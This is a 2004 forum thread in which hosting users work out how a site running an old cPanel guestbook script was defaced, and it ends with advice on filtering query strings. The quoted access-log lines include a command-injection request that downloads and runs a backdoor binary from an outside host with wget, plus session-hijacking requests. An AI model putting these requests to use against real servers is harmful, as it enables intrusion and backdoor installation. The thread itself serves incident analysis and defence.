How did they hack it?

**Jonathan** · 11-11-2004, 09:33 AM

Which guestbook script was it?
Kinda scary they can pull off random lines
after a valid URL to retreat upwards to the passwd folder.

**AndrewT** · 11-11-2004, 10:34 AM

The Guestbook script provided in cPanel is very insecure if you did not have it upgraded to the newer version.

**Jonathan** · 11-11-2004, 11:18 AM

Try searching SF.net for a good Guestbook...
http://sourceforge.net/search/?words=Guestbook

**truth** · 11-11-2004, 09:12 PM

Thank you for your replies and I am sorry for my delayed reply.

As Andrew pointed, my customer used the old version of the Guestbooks we have in CPanel. I have deleted all the files but I am not sure if they could change any other file or created some admin accounts as well.

I unserstand it was not very difficult becuase as far as I could see from the log file it took only a few minutes to change the index file. But my question is how could they do that. Because I could not get anything with those line...

**Jonathan** · 11-11-2004, 09:18 PM

Possibly some form of tool to "spoof" a header maybe?
Something to confuse the script into letting them in.

I know there's a extention for FireFox that can spoof headers,
but thats more of to help the user enter porno sites

**truth** · 11-12-2004, 12:15 PM

I am not very familiar with spoofing the header, but it seems it is not very difficult. I will make a search about it...

Thank you all for your replies.

Regards

**Amitabh** · 11-17-2004, 01:28 PM

Originally posted by truth

GET /guestbook/templates/error.php
GET /guestbook/templates/error.php?cmd=uname%20-a
GET /guestbook/templates/error.php?cmd=cd%20/tmp;wget%20http://tecnobyte.org/r0nin;chmod%20777%20r0nin;./r0nin
GET /guestbook/admin.php?action=template&session=244d9aa960b50bbd 60d399b9e7fb79ff&uid=1
GET /guestbook/admin.php?action=template&tpl_name=error.php&sessi on=244d9aa960b50bbd60d399b9e7fb79ff&uid=1

I haven't seen the script, but I assume that it's error pages have a facility to execute system calls through query string without any cross checks.

This is how they have gone about. On line 2, it runs a system command called uname with all the info( For more info on uname, see http://www.ss64.com/bash/uname.html ).

On Line 3 , they change to "tmp" directory first so that they can have writing and owner rights (cd%20/tmp -> cd /tmp, semi-colon is the command delimiter). Then they download a file named "r0nin" from a server called "tecnobyte.org" through the wget utility (wget%20http://tecnobyte.org/r0nin->wget http://tecnobyte.org/r0nin). Now they change the file mode, so that it can run as an executable (chmod%20777%20r0nin -> chmod 777 r0nin). lastly they run this file ./r0nin. This downloaded file must have conatined the code for replacing the index file on your clients site.

Hope this helps you in understanding the way the site page was replaced.

Amitabh

**Jonathan** · 11-17-2004, 02:07 PM

Wow

Any idea on how to test that to see
if it can get through any of my own sites?

**truth** · 11-18-2004, 01:43 PM

Thank you very much for your reply Amitabh.

It is now clear how they did that (also scary), but as Andrew mentioned it was a very old PHP Guestbook. I am sure the new versions are secure enough that they cannot hack it that easy.

Regards.

**djn** · 11-19-2004, 12:31 AM

At first sight (the r0nin thing is still there to download) it seems a Linux executable called PsychoPhobia Backdoor (you find this string if you open it in notepad) and lines 4 and 5 seem to me like the result of a hijacked session (session files are often placed in /tmp).
I'd say that the guestbook script not only runs system commands, but doesn't check at all nor the query inputs neither the session ID.
If somebody runs this guestbook he better disable it now...

djn

**Tycho** · 11-19-2004, 04:55 AM

Originally posted by AndrewT

The Guestbook script provided in cPanel is very insecure if you did not have it upgraded to the newer version.

This is not about phpBook isn't it ?

**truth** · 11-20-2004, 11:07 AM

No, it is the old Guestbook comes with CGI Scripts in CPanel...

**Amitabh** · 11-21-2004, 03:21 AM

Originally posted by Jonathan

Wow

Any idea on how to test that to see
if it can get through any of my own sites?

This is a simple case of query string not being correctly checked for the parameters passed. Make sure that the third party scripts that you use do not process system calls through query string and forms. And in case they do, they have relevant checks in place to properly filter those.

Sadly, there is no single way of determining if the code in question is vulnerable to this type script problems

Regards
AMitabh

How did they hack it?

How did they hack it?

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment